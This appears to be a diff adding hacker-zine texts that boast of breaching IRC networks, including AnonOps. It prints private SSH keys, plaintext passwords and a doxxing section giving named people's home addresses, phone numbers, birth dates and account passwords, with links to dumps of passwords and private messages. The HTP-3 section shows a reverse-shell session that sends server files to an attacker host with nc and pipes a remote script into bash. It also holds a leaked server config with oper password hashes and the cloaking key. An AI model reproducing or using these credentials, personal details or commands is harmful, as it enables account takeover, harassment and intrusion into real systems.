+drwxr-xr-x  2 backup users    224 2009-10-07 12:58 hornet
+drwxr-xr-x  2 backup users   1336 2010-08-24 11:23 ice
+drwxr-xr-x  2 backup users   1216 2010-11-12 16:07 janco
+drwxr-xr-x  3 backup users    264 2011-08-13 01:27 magic
+drwxr-xr-x  3 backup users   1416 2011-07-26 12:32 merlin
+drwxr-xr-x  2 backup users   1432 2011-05-16 05:55 multimag
+drwxr-xr-x  2 backup users   1640 2010-10-11 15:49 phantom
+drwxr-xr-x  2 backup users   1680 2011-01-13 15:57 sidewinder
+drwx------  2 backup users    320 2011-08-12 18:52 .ssh
+drwxr-xr-x  2 backup users   1176 2009-10-14 10:52 sydex
+-rw-------  1 backup  1452   4999 2011-08-12 18:52 .viminfo
+
+backup () sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII            
+-----BEGIN DSA PRIVATE KEY-----
+MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
+mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
+OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
+b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
+1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
+iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
+qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
+coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
++y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
+ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
+hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
+7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
+snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
+mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
+swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
+XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
+yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
+ovpJJvoWRqPg6WS+lyV49RWzMw==
+-----END DSA PRIVATE KEY-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
+a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
+Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
+Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
+oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
+dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
+UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
+6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
+hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
+RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
+rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
+tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
+mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
+1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
+fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
+AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
+PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
+XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
+dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
+WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
+fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
+K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
+NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
+ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
+yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
+-----END RSA PRIVATE KEY-----
+
+jared () sidewinder netonecom net weJAruSE
+http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
+trix () sidewinder netonecom net trix4kids
+
+molkmin -> jared: ah, you plan on lettingothers ssh in? 
+jared -> molkmin: no i thought you did 
+molkmin -> jared: hell no. 
+jared -> molkmin: okay well then forget what i said 
+molkmin -> jared: there are like 5 people that can ssh into sidewinder 
+molkmin -> jared: or maybe 7 
+jared -> molkmin: and only 2 of them are convicted felons 
+molkmin -> jared: I just recently secured SSH 
+jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
+molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL 
+jared -> molkmin: grr
+
+:: 0x06 - d0x ::
+Axod
+Name: Jimmy Moore
+Location: Probably out of the UK
+NickServ: axod:383cf3a3f7c2
+Oper: axod:ce18da2ddae4
+Email: jimmy.moore () gmail com
+Email2: jimmy () axod net
+Email3: axod () axod net
+Email4: axodmedia () gmail com
+Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
+http://bizzy.co.uk/uk/05956691/axod-media
+http://twitter.com/#!/mibbit
+http://twitter.com/#!/axod
+http://digg.com/axod
+http://axod.blogspot.com/
+
+
+Azander
+Name: Alanon Zander
+Address: 2132 South 29 Rd Cadillac, MI 49601
+NickServ: Azander:kikicat
+Oper: azander:flagon3
+Email: alanonzander () gmail com <<< kikicat
+Email2: alanonzander () yahoo com <<< password recovery sends back to gmail LOL
+https://plus.google.com/113170461621014873855/posts
+http://www.myspace.com/alanonzander
+http://user.netonecom.net/~azander/alanon.htm
+
+
+Havvy
+Name: Ryan Havvy
+Age: 18?
+Address: Somewhere in Washougal, WA
+NickServ: Havvy:hmagic
+Oper: havvy:hknight
+Email: ryan.havvy () gmail com
+http://twitter.com/#!/havvy
+http://havvy.wordpress.com/
+http://www.stumbleupon.com/stumbler/Havvy/
+havvy havvy
+xkcd.com/936/ Password security explained in a couple panels.
+10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
+
+
+Hercule
+Name: Jürgen Wind
+Location: Germany
+NickServ: Hercule:herc47
+Oper: hercule:0b2ac71dc51f
+Email: jwind () gmx de
+
+
+Joshua
+Name: Joshua Luckers
+Age: 23
+DOB: 06/15/1988
+NickServ: Joshua:TwEaKeRs
+Oper: joshua:ec31e1a98607
+Email: joshua () sensiva net
+Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
+http://joshualuckers.nl/
+
+Kitsune
+Name: Todd Parker
+Email: kitsune () sbcglobal net
+NickServ: Kitsune:undquiet
+Oper: kitsune:$5T`mIb5705
+http://nenolod.net/~nenolod/mibbit-debacle.html
+
+
+Molkmin
+Name: Thomas W Lyon
+Age: 58
+DOB: 06/04/1953
+Address: 2188 US Highway 10 Sears, MI 49679-8073
+NickServ: molkmin:sotw1btn
+Oper: molkmin:ghotisotwbtn
+Email: tlyon () netonecom net
+Email2: fxrocker () gmail com
+Phone: 231-734-6144
+http://www.netonecom.net
+http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
+http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
+
+
+Pottsi
+Name: Ian Potts
+Age: 24
+Location: Manchester, UK
+NickServ: pottsi:digger
+Email: pottsi () pottsi com
+Email2: ian1potts () aol com
+Email3: iantom90 () hotmail co uk
+http://pottsi.com/
+http://www.myspace.com/56242380
+
+
+Sindacious
+Name: James Clifton Newton
+Age: 19
+DOB: 05/06/1992
+Address: 1506 Jenks Ave Panama City, FL 32405
+Oper: sindacious:284adflgy343
+Phone: 785-746-0322, 850-215-2518
+Email: admin () SinIRC net
+http://sindacio.us/
+http://www.sindacious.com (It just redirects to sindacio.us)
+http://twitter.com/sindacious
+
+:: 0x07 - exit ::
+
+            K1LL Th3 G1b50n!
+
+
+attachm3nts >>>
+
+n3t0nec0m shad0ws
+m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
+m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
+
+w1k1 pass3s
+m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
+m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
+
+n1cks3rv pass3s
+m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
+m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
+
+pMs
+m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
+m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
+
+cHaN msGs
+http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
+
+
+root () tools:~# wall <<< "E0F"
+                                                                               
+Broadcast Message from root () tools                                              
+        (/dev/pts/3) at [redacted] ...                                         
+                                                                               
+E0F                                                                            
+                                                                               
+
+

htp/HTP-3.txt

@@ -0,0 +1,816 @@
+888    888        d8888  .d8888b.  888    d8P  
+888    888       d88888 d88P  Y88b 888   d8P  
+888    888      d88P888 888    888 888  d8P    
+8888888888     d88P 888 888        888d88K    
+888    888    d88P  888 888        8888888b    
+888    888   d88P   888 888    888 888  Y88b  
+888    888  d8888888888 Y88b  d88P 888   Y88b  
+888    888 d88P     888  "Y8888P"  888    Y88b
+                             _____          
+8888888888 888           ,-:` \;',`'-
+888        888         .'-;_,;  ':-;_,'.
+888        888        /;   '/    ,  _`.-\
+8888888    888       | '`. (`     /` ` \`|
+888        888       |:.  `\`-.   \_   / |
+888        888       |     (   `,  .`\ ;'|
+888        888        \     | .'     `-'/
+8888888888 88888888    `.   ;/        .'
+                         `'-._____.-'`
+                                     
+8888888b.  888             d8888 888b    888 8888888888 88888888888        d8888
+888   Y88b 888            d88888 8888b   888 888            888           d88888
+888    888 888           d88P888 88888b  888 888            888          d88P888
+888   d88P 888          d88P 888 888Y88b 888 8888888        888         d88P 888
+8888888P"  888         d88P  888 888 Y88b888 888            888        d88P  888
+888        888        d88P   888 888  Y88888 888            888       d88P   888
+888        888       d8888888888 888   Y8888 888            888      d8888888888
+888        88888888 d88P     888 888    Y888 8888888888     888     d88P     888
+                <shitstorm> lol who the fuck is carlos
+                              CARLOS1337
+                               PRESENTE
+                          LOL ANONOPS MUERTO
+                           CERO DIA EDICION
+            
+ ┌─────────────────────────┐
+ │ :: Table of Contents :: │
+ ├─────────────────────────┤
+ │ 0x01 ~ Prefac3          │
+ ├─────────────────────────┤
+ │ 0x02 ~ s3rv1c3s pwn     │
+ ├─────────────────────────┤
+ │ 0x03 ~ iRCd pwn         │
+ ├─────────────────────────┤
+ │ 0x04 ~ b0x pwn          │
+ ├─────────────────────────┤
+ │ 0x05 ~ 1ps              │
+ ├─────────────────────────┤
+ │ 0x06 ~ l0l sh1t         │
+ ├─────────────────────────┤
+ │ 0x07 ~ FiL3z            │
+ ├─────────────────────────┤
+ │ 0x08 ~ ex1t             │
+ └─────────────────────────┘
+
+                            :: 0x01 - Prefac3 ::
+            
+    Over the course of the following months, it has become very clear to us that
+AnonOps no longer stands for the values of open speech, freedom of opinion and
+has instead transformed itself into a network rampent with trolls, abusive
+channel operators, and a generally unwelcoming place for those whom wish to
+communicate and gather to fight the powers of corruption, and those whom wish
+to censor our open internet. Various attempts have been made in the past to
+course correct AnonOps, but the totalitarian IRC operator regime has remained
+intact.
+    The AnonOps network prides itself in being "secure", however, such is not
+the case. Rather, they employ incompetent and highly unprofessional channel and 
+IRC operators, allowing their personal grudges to interfere with the operation
+of a secure network for Anonymous. Newcomers to the network are welcomed by a
+spirit of condescention and arrogance, as any legitimate question or concern is
+slowly drowned out by the laughter of the senior members of the chatroom.
+Channel operators rather than discourage such behavior, applaud it, joining in,
+and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
+to speak out against the way the network is ran is met with kick, ban, or zline.
+A decentralized organization such as Anonymous cannot thrive on a network ran by
+such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
+one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
+an idea; ideas are bulletproof. 
+    Anonymous cannot be owned or controlled by a small group of faggot
+totaltarian operators. Thus we have decided to lombotomize the cancer that is
+AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
+against us as an agent of censorship, unlulzy pseudo-activism and immense
+faggotry, and thus must be eliminated. 
+    AnonOps has proven itself insecure and fault prone in the past. We are here
+to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
+actions, they have proven themselves against our ideals. Welcome to thecourt of
+the internet, AnonOps. You shall be persecuted for your crimes against the
+freedom of chats, your utter and repeated failure as an IRC network, your aid to
+the spread of namefagging, and your gross negligence in securing the identities
+of those whom chat and remain Anonymous on your network. 
+    AnonOps has shown time and time again it is too large of a target, and very
+well capable of corrupting the ideals which fuels the fight in every Anon.
+As long as AnonOps stay online, they will continue to adulterate our cause,
+bastardizing ideals of Anonymous, and running a network where the only lulz to
+be had are that of the failures whom chat there and run the network. Such
+activity cannot continue. 
+
+Let's drop the formalities now, and get down to business!
+
+                        :: 0x02 - s3rv1c3s pwn ::
+                 ¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
+        ~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
+
+After probing AnonOps for quite a while, we figured out that they were using
+a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
+zero day we were able to get ourselves a reverse shell.
+
+ connect to [REDACTED] from 46.182.105.86 38604
+[anonops@ns1 ~]$ id
+uid=502(anonops) gid=502(anonops) groups=502(anonops)
+
+# Let's go ahead and snag ourselves some juicy files... 
+[anonops@ns1 ~]$ cd ~/inspircd/run/conf
+[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
+[anonops@ns1 conf]$ cd ~/services
+[anonops@ns1 services]$ nc htp 443 < nick.db
+[anonops@ns1 services]$ nc htp 443 < chan.db
+[anonops@ns1 services]$ nc htp 443 < oper.db
+[anonops@ns1 services]$ nc htp 443 < os_info.db
+
+# And then let's go ahead and hook services.
+[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
+[anonops@ns1 services]$ killall services; ./services; exit
+
+
+                         :: 0x02 - iRCd pwn ::
+                              ¡Dios Mios!
+
+<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
+
+<power hash="sha256"
+    diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
+    restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
+
+<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
+    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
+    commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
+    modes="+xiw">
+    
+<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
+    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
+    commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
+    modes="+xiw">
+
+<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+xwi">
+<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
+hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+
+<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
+    softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
+    localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
+    
+<cidr ipv4clone="32" ipv6clone="128">
+<channels users="50" opers="100">
+<banlist chan="*" limit="128">
+<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
+    fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
+    cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
+    allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
+    serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
+    invitebypassmodes="no">
+<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
+    quietbursts="yes" nouserdns="no">
+<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
+    hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
+    maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
+    restrictbannedusers="yes" genericoper="yes" userstats="">
+<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
+    maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
+<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
+<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
+
+<badnick nick="ChanServ" reason="Reserved For Services">
+<badnick nick="NickServ" reason="Reserved For Services">
+<badnick nick="OperServ" reason="Reserved For Services">
+<badnick nick="MemoServ" reason="Reserved For Services">
+<badnick nick="BotServ" reason="Reserved For Services">
+<badnick nick="vHostServ" reason="Reserved For Services">
+<badhost host="IRCLOIC@*" reason="wrong server">
+
+<uline server="services.anonops.in" silent="yes">
+<uline server="defender.anonops.in" silent="yes">
+
+# Oper Classes
+<class name="Root"
+    commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
+    GRELOADMODULE CLEARCACHE">
+<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
+    GLOADMODULE GUNLOADMODULE SQUIT"
+    privs="users/auspex channels/auspex servers/auspex users/mass-message
+    channels/high-join-limit channels/set-permanent users/flood/no-throttle
+    users/flood/increased-buffers" usermodes="*" chanmodes="*">
+<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
+    CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
+<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
+    RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
+    channels/high-join-limit" usermodes="*" chanmodes="*">
+<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
+    chanmodes="*" privs="users/mass-message">
+<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
+    CHECK CHGNAME" usermodes="*" chanmodes="*">
+<class name="OperUnlag" privs="users/flood/no-throttle
+    users/flood/increased-buffers">
+<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
+    OJOIN FILTER CBAN">
+
+# Oper Types
+<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
+    HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
+<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
+    ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
+<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
+    vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
+    MODEDEVOICE MODEHALFOP MODEDEHALFOP">
+<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
+<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
+    ServerLink Shutdown" vhost="servadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
+
+# Oper List
+<oper name="power2all" hash="sha256"
+    password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
+    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+<oper name="Cody" hash="sha256"
+    password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="pi" hash="sha256"
+    password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
+    host="*@*" vhost="anonops.staff" type="RootAdmin">
+<oper name="p0ke" hash="sha256"
+    password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="jaychow" hash="sha256"
+    password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="shitstorm" hash="sha256"
+    password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
+    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+#<oper name="Isis" hash="sha256"
+#   password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
+#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+#<oper name="Nerdo" hash="sha256"
+#   password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
+#   host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+<oper name="evilworks" hash="sha256"
+    password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="Jupiler" hash="sha256"
+    password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+#<oper name="sharpie" hash="sha256"
+#   password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
+#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="daboogieman" hash="sha256"
+    password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="pie" hash="sha256"
+    password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+
+# Default Modules Configs
+<module name="m_md5.so">
+<module name="m_sha256.so">
+<module name="m_ripemd160.so">
+
+<module name="m_alias.so">
+<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
+    uline="yes">
+<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
+    uline="yes">
+<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
+    uline="yes" operonly="yes">
+<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
+    uline="yes">
+<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
+    uline="yes">
+<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
+    uline="yes">
+<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
+<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
+<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
+    operonly="yes">
+<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
+<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
+<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
+<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
+    uline="yes">
+
+<module name="m_allowinvite.so">
+<module name="m_alltime.so">
+<module name="m_auditorium.so">
+<auditorium opvisible="no" opcansee="yes" opercansee="yes">
+<module name="m_blockcolor.so">
+<module name="m_botmode.so">
+<module name="m_callerid.so">
+<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
+<module name="m_chancreate.so">
+<module name="m_chanprotect.so">
+<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
+    deprotectothers="yes">
+<module name="m_check.so">
+<module name="m_chghost.so">
+<module name="m_chgident.so">
+<module name="m_chgname.so">
+<module name="m_cloaking.so">
+<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
+<module name="m_close.so">
+<module name="m_clones.so">
+<module name="m_conn_umodes.so">
+#<module name="m_connectban.so">
+#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
+<module name="m_dccallow.so">
+<dccallow blockchat="yes" length="0" action="block">
+<banfile pattern="*" action="block">
+<module name="m_delayjoin.so">
+<module name="m_devoice.so">
+<module name="m_dnsbl.so">
+<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
+    reason="DroneBL" duration="30d" bitmask="253">
+<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
+    reason="ProxyBL" duration="30d" bitmask="253">
+<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
+    reason="EFnetRBL" duration="30d" bitmask="253">
+<module name="m_filter.so">
+<filteropts engine="pcre">
+<module name="m_globalload.so">
+<module name="m_globops.so">
+<module name="m_halfop.so">
+<module name="m_hidechans.so">
+<hidechans affectsopers="false">
+<module name="m_hideoper.so">
+<module name="m_inviteexception.so">
+<module name="m_joinflood.so">
+<module name="m_knock.so">
+<module name="m_lockserv.so">
+<module name="m_maphide.so">
+<module name="m_messageflood.so">
+<module name="m_muteban.so">
+<module name="m_conn_waitpong.so">
+<waitpong sendsnotice="yes" killonbadreply="no">
+<module name="m_nickflood.so">
+<module name="m_nicklock.so">
+<module name="m_nonotice.so">
+<module name="m_noctcp.so">
+<module name="m_nokicks.so">
+<module name="m_nonicks.so">
+
+#Oper modules
+<module name="m_operchans.so">
+<module name="m_ojoin.so">
+<ojoin prefix="" notice="no" op="no">
+<module name="m_operjoin.so">
+<operjoin channel="#opers" override="no">
+<module name="m_opermotd.so">
+<opermotd file="oper.motd" onoper="yes">
+<module name="m_override.so">
+<module name="m_password_hash.so">
+<module name="m_redirect.so">
+<module name="m_regex_glob.so">
+<module name="m_regex_posix.so">
+<module name="m_regex_pcre.so">
+<module name="m_regonlycreate.so">
+<module name="m_rline.so">
+<module name="m_sajoin.so">
+<module name="m_sakick.so">
+<module name="m_samode.so">
+<module name="m_sanick.so">
+<module name="m_sapart.so">
+<module name="m_satopic.so">
+<module name="m_securelist.so">
+<securehost exception="*@*.searchirc.org">
+<securehost exception="*@*.netsplit.de">
+<securehost exception="*@bot.search.mibbit.com">
+<module name="m_sethost.so">
+<module name="m_setident.so">
+<module name="m_setname.so">
+<module name="m_seenicks.so">
+<module name="m_services_account.so">
+<module name="m_showwhois.so">
+<module name="m_shun.so">
